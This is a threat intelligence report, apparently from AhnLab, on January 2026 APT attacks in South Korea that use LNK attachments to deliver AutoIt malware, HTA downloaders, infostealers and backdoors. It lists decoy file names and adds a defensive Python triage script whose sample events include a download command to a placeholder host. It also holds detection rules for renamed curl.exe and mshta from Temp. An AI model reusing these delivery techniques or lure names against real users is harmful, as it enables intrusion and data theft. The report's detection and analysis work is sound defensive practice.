January 2026 Threat Trend Report on APT Attacks (South Korea)
Overview
AhnLab monitors APT (Advanced Persistent Threat) attacks in South Korea using its own infrastructure. This report covers the classification, statistics, and features of the APT attacks in South Korea that were identified in January 2026.

Figure 1. Statistics of APT attacks in South Korea in January 2026
Most of the APT attacks confirmed in South Korea were found to be distributed via Spear Phishing methods. In particular, in January 2026, the proportion of attacks utilizing LNK files was the highest. Exploit-based attacks were also confirmed.
Trends of APT Attacks in South Korea
The infiltration types of the APT attacks against South Korea confirmed in January 2026, along with their cases and functions, are as follows:
1) Spear Phishing
Spear Phishing is a type of phishing attack that targets specific individuals or groups. Unlike regular phishing attacks, threat actors gather information on their targets during the reconnaissance phase before launching attacks. Threat actors use the collected information to craft phishing emails that recipients are likely to perceive as trustworthy. There are also cases where threat actors spoof their email addresses. Most spear phishing emails include malicious attachments or links and prompt users to open the attachments or click on the links.
The following are the types of malware distributed using this technique.
1.1 Attack using LNK
Type A
This type downloads AutoIt malware. When the malicious PowerShell command in the LNK file is executed, it accesses an external URL and downloads additional files. A characteristic of this type is that during this process, the curl.exe program is copied under a different file name (e.g., WpqNoXz.exe) and then executed. As a result, a legitimate AutoIt program and a malicious AutoIt script are downloaded. The downloaded file is registered in the task scheduler so that it is executed persistently. The malicious AutoIt script can perform the following functions: execute commands, search directories, upload files, and download files.
The confirmed file names are as follows.
| File name |
|---|
| (Issue Analysis, 2026-01-05) 2025Year China Political Situation Review and Prospects.docx.lnk |
| 01_Documentary (Immanuel)Production Proposal.pdf.lnk |
| Finished.pdf.lnk |
| 1. I want to go to that village_Synopsis.hwp.lnk |
| YouTube Campaign Paid Partnership Proposal.docx.lnk |
| Overseas Visit Performance Cooperation Proposal.pdf.lnk |

Table 1. Confirmed File Names
Type B
This type uses the curl.exe built into Windows to download a malicious HTA file into the %TEMP% folder and execute it. The malicious HTA file is distributed through a GitHub repository or Google Drive operated by the attacker, and it creates a decoy file and a downloader named “sys.dll.” This downloader loads Infostealer-type malware that leaks the user’s system information, a list of key files, and virtual asset-related information, as well as a backdoor that executes commands received from the attacker in memory.
The confirmed file names are as follows.
| File name |
|---|
| shcard_202512.html.lnk |
| National Tax Notice.pdf.lnk |
| Password.txt.lnk |

Table 2. Confirmed File Names
※ The detailed information can be found in the attached file.
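The two LNK-delivery patterns above leave process-level traces a defender can hunt for: Type A runs a renamed copy of curl.exe (the PE version info still says curl.exe), Type B runs mshta.exe against an .hta dropped in %TEMP%, and both arrive as double-extension .lnk files. The following Python triage script is an added example, not part of the original report; the Sysmon-style events, paths and file names it scans are constructed for illustration.

```python
"""Triage process-creation events for the Type A / Type B LNK delivery traces."""
import ntpath
import re

# Constructed sample events in Sysmon Event ID 1 style (not real telemetry).
EVENTS = [
    # Type A trace: curl.exe copied under another name, launched by PowerShell
    {"Image": r"C:\Users\u\AppData\Local\Temp\WpqNoXz.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "WpqNoXz.exe -o a.exe http://example.invalid/a",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # Type B trace: mshta.exe executing an .hta from the user's Temp folder
    {"Image": r"C:\Windows\System32\mshta.exe",
     "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\sys.hta",  # constructed name
     "ParentImage": r"C:\Windows\System32\curl.exe"},
    # Benign: curl.exe run under its own name by an interactive user
    {"Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe -s https://update.example.invalid/pkg",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Double extensions seen in Tables 1 and 2 (document-looking name, .lnk payload)
DOUBLE_EXT_LNK = re.compile(r"\.(docx|pdf|hwp|html|txt)\.lnk$", re.IGNORECASE)


def renamed_curl(ev):
    """Type A: binary whose version info is curl.exe but whose on-disk name differs."""
    return (ev.get("OriginalFileName", "").lower() == "curl.exe"
            and ntpath.basename(ev["Image"]).lower() != "curl.exe")


def hta_from_temp(ev):
    """Type B: mshta.exe launching an .hta located under a Temp directory."""
    cmd = ev.get("CommandLine", "").lower()
    return (ntpath.basename(ev["Image"]).lower() == "mshta.exe"
            and "\\temp\\" in cmd and ".hta" in cmd)


def lnk_double_extension(name):
    """Attachment name check: document extension immediately followed by .lnk."""
    return bool(DOUBLE_EXT_LNK.search(name))


def triage(events):
    """Return (rule, image) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        if renamed_curl(ev):
            findings.append(("renamed_curl", ev["Image"]))
        if hta_from_temp(ev):
            findings.append(("hta_from_temp", ev["Image"]))
    return findings
```

The OriginalFileName field comes from the PE version resource, which is why the renamed copy in Type A is still recognisable as curl.exe.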